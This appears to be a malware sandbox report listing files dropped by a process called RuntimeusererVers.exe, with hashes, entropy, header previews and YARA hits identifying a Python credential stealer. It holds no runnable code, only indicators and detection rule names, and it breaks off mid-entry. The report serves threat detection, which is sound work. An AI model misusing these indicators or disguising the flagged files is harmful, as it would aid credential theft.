                                                                                                                                                                                                                                        SHA-512:16A2E2E262C0246906D48EA67EE17D38C07712A1B97EB18C4F8F656F39EB187E18DA3EDC6D2FDF49DC9E35B92F6BA6BDE0F00948C3E68E146F7EDCD1E9C9404A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....)..p..!....p.......p..!....p..!....p..!....p..G....p...p...p..G....p..G....p..G.E..p..G....p..Rich.p..........................PE..d...f.Ae.........." ...#.....`...............................................P............`.............................................\...........0..........|5...........@.......s..............................Pr..@...............8............................text............................... ..`.rdata..............................@..@.data...0...........................@....pdata..|5.......6..................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):524800
                                                                                                                                                                                                                                        Entropy (8bit):6.43361179692515
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:LhqzrH09USNNSNkUvpMnAp5Oqwj/k6OsoOfu/PYS/O51Y/H:LhqzrH0evpMnApu86OsynYUPv
                                                                                                                                                                                                                                        MD5:DC08F04C9E03452764B4E228FC38C60B
                                                                                                                                                                                                                                        SHA1:317BCC3F9C81E2FC81C86D5A24C59269A77E3824
                                                                                                                                                                                                                                        SHA-256:B990EFBDA8A50C49CD7FDE5894F3C8F3715CB850F8CC4C10BC03FD92E310260F
                                                                                                                                                                                                                                        SHA-512:FBC24DD36AF658CECE54BE14C1118AF5FDA4E7C5B99D22F99690A1FD625CC0E8AA41FD9ACCD1C74BB4B03D494B6C3571B24F2EE423AAAE9A5AD50ADC583C52F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t....:..t..S....t.......t..S....t..S....t..S....t..5....t...t..dt..5....t..5....t..5.V..t..5....t..Rich.t..........................PE..d...Z.Ae.........." ...#.....................................................@............`.............................................d...$........ ...........*...........0..d....k...............................j..@............... ............................text............................... ..`.rdata..............................@..@.data...(-.......(..................@....pdata...*.......,..................@..@.rsrc........ ......................@..@.reloc..d....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24189952
                                                                                                                                                                                                                                        Entropy (8bit):6.346346908201171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:CFUine3T2HszWM/LvOrN6hC0lxy6D5DKJBlZGODSr1YQaxLaIaiFrEF9o31g6d6T:lD+SWKOr4CeXDuHwODSw6uc
                                                                                                                                                                                                                                        MD5:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        SHA1:CEB0FE13317E7EF87377D385E9CF869343958971
                                                                                                                                                                                                                                        SHA-256:6D350FD6D807F267F5B615CF5937DABB99E5F30ED3B3310E1BF2AA2A34F93F8E
                                                                                                                                                                                                                                        SHA-512:9CDC43BCE53CC6B9A388B9FB50BF81DB413432BEB0B607D14942DB6CEDDCEEB38CBEB9896916BF73A72E06731D16755F20A475523BE63177996A3D9BCDD6FA0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................N..........0[.....0......0......0...................y....7.......7.....Rich...................PE..d...7s6g.........."....(.....X......0..........@..............................w...........`..................................................l..<.......8.......t;............w.(...PY...............................X..@............................................text.............................. ..`.rdata..............................@..@.data...............................@....pdata..t;.......<..."..............@..@.rsrc...8............^..............@..@.reloc..(.....w.......q.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.186171767195339
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2icaMc9070S1Qx+gTKnEzBIPOnr07SyLLDPx:a2icrcj2Qx+gTOEzBIPOnYxXx
                                                                                                                                                                                                                                        MD5:79F71C92C850B2D0F5E39128A59054F1
                                                                                                                                                                                                                                        SHA1:A773E62FA5DF1373F08FEAA1FB8FA1B6D5246252
                                                                                                                                                                                                                                        SHA-256:0237739399DB629FDD94DE209F19AC3C8CD74D48BEBE40AD8EA6AC7556A51980
                                                                                                                                                                                                                                        SHA-512:3FDEF4C04E7D89D923182E3E48D4F3D866204E878ABCAACFF657256F054AEAFAFDD352B5A55EA3864A090D01169EC67B52C7F944E02247592417D78532CC5171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../T..A...A...A.......A...@...A...D...A...E...A...B...A.~.@...A...@...A...@.2.A.~.L...A.~.A...A.~.....A.~.C...A.Rich..A.........PE..d......d.........." ...".R..........`.....................................................`.............................................P...`...d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):820736
                                                                                                                                                                                                                                        Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                        MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                        SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                        SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                        SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ls...........u......q......u......q......q......q.....Yq...........Hp.....Hp.....Hp.....Hp.....Rich............................PE..d......d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84760
                                                                                                                                                                                                                                        Entropy (8bit):6.570831353064175
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                                                                                                                                                                                                        MD5:3859239CED9A45399B967EBCE5A6BA23
                                                                                                                                                                                                                                        SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                                                                                                                                                                                                        SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                                                                                                                                                                                                        SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ...".....^......L........................................P.......`....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):181760
                                                                                                                                                                                                                                        Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                        MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                        SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                        SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                        SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):123664
                                                                                                                                                                                                                                        Entropy (8bit):6.058417150946148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                                                                                                                                                                                                        MD5:BD36F7D64660D120C6FB98C8F536D369
                                                                                                                                                                                                                                        SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                                                                                                                                                                                                        SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                                                                                                                                                                                                        SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ..."............p\..............................................|o....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253200
                                                                                                                                                                                                                                        Entropy (8bit):6.559097478184273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                                                                                                                                                                                                        MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                                                                                                                                                                                                        SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                                                                                                                                                                                                        SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                                                                                                                                                                                                        SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".v...<......L...............................................Rn....`..........................................T..P...`T...................&......./......P.......T...........................P...@............................................text....u.......v.................. ..`.rdata..<............z..............@..@.data....*...p...$...R..............@....pdata...&.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.222786912280051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                                                                                                                                                                                                        MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                                                                                                                                                                                                        SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                                                                                                                                                                                                        SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                                                                                                                                                                                                        SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".T...~......`?...............................................%....`.............................................P.......................,......../......\...0}..T............................{..@............p..(............................text...uR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):158992
                                                                                                                                                                                                                                        Entropy (8bit):6.8491146526380025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                                                                                                                                                                                                        MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                                                                                                                                                                                                        SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                                                                                                                                                                                                        SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                                                                                                                                                                                                        SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...".b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34584
                                                                                                                                                                                                                                        Entropy (8bit):6.4080285175428715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aHI6RwgJ5xe3Sc88GnJ8xIPWtpu5YiSyvDIqPxWEu:CIoJ5U3Sc88GJ8xIPWtpE7SyMqPx
                                                                                                                                                                                                                                        MD5:827439C35A0CEE0DE6421AF039CA7FF9
                                                                                                                                                                                                                                        SHA1:E7FDC4624C3D4380E527EE6997D4EBDEEC353EEA
                                                                                                                                                                                                                                        SHA-256:B86E19E57A415AE9D65D4C0A86658DE2D2AD6A97617CB514A105449C9B679D89
                                                                                                                                                                                                                                        SHA-512:92F2344253ECCF24CAFDA8F5559E2FA4C21D5B0889540139278032491596EC0AC743B18D4074AE12CB15060EDFED14B243A37B23434E7B2F15998FADDA3D15F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z*j.4yj.4yj.4yc..yh.4y%.5xh.4y%.1xg.4y%.0xb.4y%.7xi.4y..5xh.4yj.5y3.4y!.5xo.4y..9xh.4y..4xk.4y...yk.4y..6xk.4yRichj.4y........................PE..d......d.........." ...".....<......0...............................................Y.....`.........................................0D..`....D..x....p.......`.......X.../...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50968
                                                                                                                                                                                                                                        Entropy (8bit):6.432736275046285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:gwFMCcP4W1vqJiR5RMWlpX4Ju6r2VIPXtz5YiSyvbPxWEuw:ZFMiJifKJulVIPXt97SyjPx9
                                                                                                                                                                                                                                        MD5:E5ACEAF21E82253E300C0B78793887A8
                                                                                                                                                                                                                                        SHA1:C58F78FBBE8713CB00CCDFEB1D8D7359F58EBFDE
                                                                                                                                                                                                                                        SHA-256:D950342686C959056FF43C9E5127554760FA20669D97166927DD6AAE5494E02A
                                                                                                                                                                                                                                        SHA-512:517C29928D6623CF3B2BCDCD68551070D2894874893C0D115A0172D749B6FE102AF6261C0FD1B65664F742FA96ABBCE2F8111A72E1A3C2F574B58B909205937F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........){.G(.G(.G(...(.G(..F).G(..B).G(..C).G(..D).G(..F).G(.F(..G(..F).G(..C).G(..J).G(..G).G(..(.G(..E).G(Rich.G(........................PE..d......d.........." ...".B...X............................................................`.........................................0...X................................/......,....f..T...........................Pe..@............`...............................text...^A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32528
                                                                                                                                                                                                                                        Entropy (8bit):6.448063770045404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AuCvO+MZFryl9SDCP6rXv+mkWsniRq9IPQUkHQIYiSy1pCQqIPxh8E9VF0NykOBw:1+yF+6rX2mk599IPQUO5YiSyv3PxWEun
                                                                                                                                                                                                                                        MD5:F00133F7758627A15F2D98C034CF1657
                                                                                                                                                                                                                                        SHA1:2F5F54EDA4634052F5BE24C560154AF6647EEE05
                                                                                                                                                                                                                                        SHA-256:35609869EDC57D806925EC52CCA9BC5A035E30D5F40549647D4DA6D7983F8659
                                                                                                                                                                                                                                        SHA-512:1C77DD811D2184BEEDF3C553C3F4DA2144B75C6518543F98C630C59CD597FCBF6FD22CFBB0A7B9EA2FDB7983FF69D0D99E8201F4E84A0629BC5733AA09FFC201
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1...0...1...4...1...5...1...2...1.~.0...1...0...1...0...1.~.<...1.~.1...1.~.....1.~.3...1.Rich..1.........PE..d......d.........." ...".....8......................................................./....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79640
                                                                                                                                                                                                                                        Entropy (8bit):6.290841920161528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                                                                                                                                                                                                        MD5:1EEA9568D6FDEF29B9963783827F5867
                                                                                                                                                                                                                                        SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                                                                                                                                                                                                        SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                                                                                                                                                                                                        SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".l...........%.......................................P......V.....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...:k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120080
                                                                                                                                                                                                                                        Entropy (8bit):6.255942152365855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eZ1UnKJVckfKr0in6CL1F4TSlNdtAhfw5ymJSoEQ6MV4KUq8BIPOQXxxp:ecnoVckfjab5kQ6FPC
                                                                                                                                                                                                                                        MD5:D7B9ED5F37519B68750ECB5DEFB8E957
                                                                                                                                                                                                                                        SHA1:661CF73707E02D2837F914ADC149B61A120DDA7D
                                                                                                                                                                                                                                        SHA-256:2CE63E16DF518AE178DE0940505FF1B11DA97A5B175FE2A0D355B2EE351C55FD
                                                                                                                                                                                                                                        SHA-512:F04708C28FEB54F355D977E462245B183A0B50F4DB6926C767E8F1499E83E910B05A3023B84D398FB5DD87743FE6146DBBC3E1CAAED5351C27396F16746C6D6B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................n.....M.......M.......M.......M.......M...............I..............................................Rich....................PE..d...%..d.........." ..."............`...............................................T.....`..........................................Z..P....Z.........................../..............T...............................@............................................text............................... ..`.rdata..l...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):161040
                                                                                                                                                                                                                                        Entropy (8bit):6.029728458381984
                                                                                                                                                                                                                                        Encrypted:false
